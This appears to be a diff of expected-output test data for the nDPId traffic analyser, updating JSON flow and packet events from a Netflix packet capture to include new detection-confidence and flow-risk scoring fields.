-00850{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":177,"source":"netflix.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319033943,"flow_last_seen":1484319033997,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":229,"flow_tot_l4_payload_len":229,"flow_avg_l4_payload_len":57,"midstream":0,"ts_msec":1484319033997,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.69.204.241","src_port":53119,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ichnaea.netflix.com","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}}
-00907{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":179,"source":"netflix.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319033943,"flow_last_seen":1484319034048,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1677,"flow_avg_l4_payload_len":279,"midstream":0,"ts_msec":1484319034048,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.69.204.241","src_port":53119,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ichnaea.netflix.com","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}}
-01337{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":180,"source":"netflix.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1484319033943,"flow_last_seen":1484319034049,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3125,"flow_avg_l4_payload_len":446,"midstream":0,"ts_msec":1484319034049,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.69.204.241","src_port":53119,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ichnaea.netflix.com","server_names":"ichnaea.netflix.com,beacon.netflix.com,presentationtracking.netflix.com,nmtracking.netflix.com,customerevents.netflix.com","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=California, L=los gatos, O=Netflix, Inc., OU=Ops, CN=customerevents.netflix.com","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1","fingerprint":"50:D6:DB:AF:1D:A3:83:52:E6:0E:15:8F:98:78:EE:2F:23:FD:E2:3F"}}
+00876{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":177,"source":"netflix.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319033943,"flow_last_seen":1484319033997,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":229,"flow_tot_l4_payload_len":229,"flow_avg_l4_payload_len":57,"midstream":0,"ts_msec":1484319033997,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.69.204.241","src_port":53119,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ichnaea.netflix.com","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}}
+00933{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":179,"source":"netflix.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319033943,"flow_last_seen":1484319034048,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1677,"flow_avg_l4_payload_len":279,"midstream":0,"ts_msec":1484319034048,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.69.204.241","src_port":53119,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ichnaea.netflix.com","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}}
+01363{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":180,"source":"netflix.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1484319033943,"flow_last_seen":1484319034049,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3125,"flow_avg_l4_payload_len":446,"midstream":0,"ts_msec":1484319034049,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.69.204.241","src_port":53119,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ichnaea.netflix.com","server_names":"ichnaea.netflix.com,beacon.netflix.com,presentationtracking.netflix.com,nmtracking.netflix.com,customerevents.netflix.com","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=California, L=los gatos, O=Netflix, Inc., OU=Ops, CN=customerevents.netflix.com","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1","fingerprint":"50:D6:DB:AF:1D:A3:83:52:E6:0E:15:8F:98:78:EE:2F:23:FD:E2:3F"}}
 00535{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":205,"source":"netflix.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319034890,"flow_last_seen":1484319034890,"flow_idle_time":600000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"ts_msec":1484319034890,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"239.255.255.250","l4_proto":2,"flow_datalink":1,"flow_max_packets":3}
 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":205,"source":"netflix.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1484319034890,"flow_idle_time":600000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":38,"pkt_len":60,"pkt_l4_len":8,"ts_msec":1484319034890,"pkt":"AQBef\/\/65JjWH70UCABGAAAgKLUAAAECSnnAqAEH7\/\/\/+pQEAAAWAPoE7\/\/\/+gAAAAAAAAAAAAAAAAAA"}
-00568{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":205,"source":"netflix.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319034890,"flow_last_seen":1484319034890,"flow_idle_time":600000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"ts_msec":1484319034890,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"239.255.255.250","l4_proto":2,"ndpi": {"proto":"IGMP","breed":"Acceptable","category":"Network"}}
+00594{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":205,"source":"netflix.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319034890,"flow_last_seen":1484319034890,"flow_idle_time":600000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"ts_msec":1484319034890,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"239.255.255.250","l4_proto":2,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}}
 00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":208,"source":"netflix.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319035004,"flow_last_seen":1484319035004,"flow_idle_time":180000,"flow_min_l4_payload_len":55,"flow_max_l4_payload_len":55,"flow_tot_l4_payload_len":55,"flow_avg_l4_payload_len":55,"midstream":0,"ts_msec":1484319035004,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":51949,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00504{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":208,"source":"netflix.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1484319035004,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":97,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":97,"pkt_l4_len":63,"ts_msec":1484319035004,"pkt":"gCqoTGHM5JjWH70UCABFAABT4P4AAP8RV0LAqAEHwKgBAcrtADUAP\/fHGiEBAAABAAAAAAAACmFwaS1nbG9iYWwHbGF0ZW5jeQZwcm9kYWEHbmV0ZmxpeANjb20AAAEAAQ=="}
-00754{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":208,"source":"netflix.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319035004,"flow_last_seen":1484319035004,"flow_idle_time":180000,"flow_min_l4_payload_len":55,"flow_max_l4_payload_len":55,"flow_tot_l4_payload_len":55,"flow_avg_l4_payload_len":55,"midstream":0,"ts_msec":1484319035004,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":51949,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.NetFlix","breed":"Fun","category":"Video"},"dns": {"query":"api-global.latency.prodaa.netflix.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00780{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":208,"source":"netflix.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319035004,"flow_last_seen":1484319035004,"flow_idle_time":180000,"flow_min_l4_payload_len":55,"flow_max_l4_payload_len":55,"flow_tot_l4_payload_len":55,"flow_avg_l4_payload_len":55,"midstream":0,"ts_msec":1484319035004,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":51949,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"},"dns": {"query":"api-global.latency.prodaa.netflix.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":209,"source":"netflix.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1484319035024,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":225,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":225,"pkt_l4_len":191,"ts_msec":1484319035024,"pkt":"5JjWH70UgCqoTGHMCABFAADT4UNAAEAR1X3AqAEBwKgBBwA1yu0AvyycGiGBgAABAAgAAAAACmFwaS1nbG9iYWwHbGF0ZW5jeQZwcm9kYWEHbmV0ZmxpeANjb20AAAEAAcAMAAEAAQAAADoABDRZJ4vADAABAAEAAAA6AAQ0KHEVwAwAAQABAAAAOgAENrvKVcAMAAEAAQAAADoABDQnzgXADAABAAEAAAA6AAQ2lKPwwAwAAQABAAAAOgAENrujrcAMAAEAAQAAADoABDQoEorADAABAAEAAAA6AAQ0KGy7"}
-00770{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":209,"source":"netflix.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1484319035004,"flow_last_seen":1484319035024,"flow_idle_time":180000,"flow_min_l4_payload_len":55,"flow_max_l4_payload_len":183,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":119,"midstream":0,"ts_msec":1484319035024,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":51949,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.NetFlix","breed":"Fun","category":"Video"},"dns": {"query":"api-global.latency.prodaa.netflix.com","num_queries":1,"num_answers":8,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.89.39.139"}}
+00796{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":209,"source":"netflix.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1484319035004,"flow_last_seen":1484319035024,"flow_idle_time":180000,"flow_min_l4_payload_len":55,"flow_max_l4_payload_len":183,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":119,"midstream":0,"ts_msec":1484319035024,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":51949,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"},"dns": {"query":"api-global.latency.prodaa.netflix.com","num_queries":1,"num_answers":8,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.89.39.139"}}
 00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":213,"source":"netflix.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319035079,"flow_last_seen":1484319035079,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1484319035079,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.89.39.139","src_port":53132,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":213,"source":"netflix.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1484319035079,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1484319035079,"pkt":"gCqoTGHM5JjWH70UCABFAABAYJ9AAEAGvIXAqAEHNFkni8+MAbsc0sO0AAAAALAC\/\/+HyQAAAgQFtAEDAwUBAQgKH2TAbQAAAAAEAgAA"}
 00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":215,"source":"netflix.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319035080,"flow_last_seen":1484319035080,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1484319035080,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.89.39.139","src_port":53133,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
@@ -81,36 +81,36 @@
 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":221,"source":"netflix.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":3,"flow_last_seen":1484319035130,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1484319035130,"pkt":"gCqoTGHM5JjWH70UCABFAAA0gZlAAEAGm5fAqAEHNFkni8+MAbsc0sO15elB0YAQEBUZAAAAAQEICh9kwKCtiMj8"}
 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":222,"source":"netflix.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1484319035130,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1484319035130,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAACkGNAk0WSeLwKgBBwG7z40HBfk7mRgRP6ASReoSOAAAAgQFtAQCCAqtiMj8H2TAbgEDAwg="}
 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":223,"source":"netflix.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":1484319035132,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1484319035132,"pkt":"gCqoTGHM5JjWH70UCABFAAA0YNFAAEAGvF\/AqAEHNFkni8+NAbuZGBE\/BwX5PIAQEBV2pwAAAQEICh9kwKGtiMj8"}
-00850{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":224,"source":"netflix.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319035079,"flow_last_seen":1484319035134,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":208,"flow_avg_l4_payload_len":52,"midstream":0,"ts_msec":1484319035134,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.89.39.139","src_port":53132,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","ja3":"7e72698146290dd68239f788a452e7d8","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
-00850{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":225,"source":"netflix.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319035080,"flow_last_seen":1484319035136,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":208,"flow_avg_l4_payload_len":52,"midstream":0,"ts_msec":1484319035136,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.89.39.139","src_port":53133,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","ja3":"7e72698146290dd68239f788a452e7d8","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
-00907{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":227,"source":"netflix.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319035079,"flow_last_seen":1484319035185,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":276,"midstream":0,"ts_msec":1484319035185,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.89.39.139","src_port":53132,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","ja3":"7e72698146290dd68239f788a452e7d8","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}}
-01364{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":228,"source":"netflix.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1484319035079,"flow_last_seen":1484319035186,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3104,"flow_avg_l4_payload_len":443,"midstream":0,"ts_msec":1484319035186,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.89.39.139","src_port":53132,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","server_names":"api-latam.netflix.com,htmltvui.netflix.com,api-eu.netflix.com,uiboot.netflix.com,api-global.netflix.com,api-user.netflix.com,api-us.netflix.com,api.netflix.com","ja3":"7e72698146290dd68239f788a452e7d8","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=California, L=los gatos, O=Netflix, Inc., OU=Ops, CN=api.netflix.com","fingerprint":"FC:5B:F6:86:AE:E5:22:0D:60:0C:C3:DF:8F:02:80:3F:A3:60:0E:3C"}}
-00907{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":231,"source":"netflix.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319035080,"flow_last_seen":1484319035200,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":276,"midstream":0,"ts_msec":1484319035200,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.89.39.139","src_port":53133,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","ja3":"7e72698146290dd68239f788a452e7d8","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}}
-01364{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":232,"source":"netflix.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1484319035080,"flow_last_seen":1484319035215,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3104,"flow_avg_l4_payload_len":443,"midstream":0,"ts_msec":1484319035215,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.89.39.139","src_port":53133,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","server_names":"api-latam.netflix.com,htmltvui.netflix.com,api-eu.netflix.com,uiboot.netflix.com,api-global.netflix.com,api-user.netflix.com,api-us.netflix.com,api.netflix.com","ja3":"7e72698146290dd68239f788a452e7d8","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=California, L=los gatos, O=Netflix, Inc., OU=Ops, CN=api.netflix.com","fingerprint":"FC:5B:F6:86:AE:E5:22:0D:60:0C:C3:DF:8F:02:80:3F:A3:60:0E:3C"}}
+00956{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":224,"source":"netflix.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319035079,"flow_last_seen":1484319035134,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":208,"flow_avg_l4_payload_len":52,"midstream":0,"ts_msec":1484319035134,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.89.39.139","src_port":53132,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","ja3":"7e72698146290dd68239f788a452e7d8","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
+00956{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":225,"source":"netflix.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319035080,"flow_last_seen":1484319035136,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":208,"flow_avg_l4_payload_len":52,"midstream":0,"ts_msec":1484319035136,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.89.39.139","src_port":53133,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","ja3":"7e72698146290dd68239f788a452e7d8","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
+01013{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":227,"source":"netflix.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319035079,"flow_last_seen":1484319035185,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":276,"midstream":0,"ts_msec":1484319035185,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.89.39.139","src_port":53132,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","ja3":"7e72698146290dd68239f788a452e7d8","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}}
+01470{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":228,"source":"netflix.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1484319035079,"flow_last_seen":1484319035186,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3104,"flow_avg_l4_payload_len":443,"midstream":0,"ts_msec":1484319035186,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.89.39.139","src_port":53132,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": 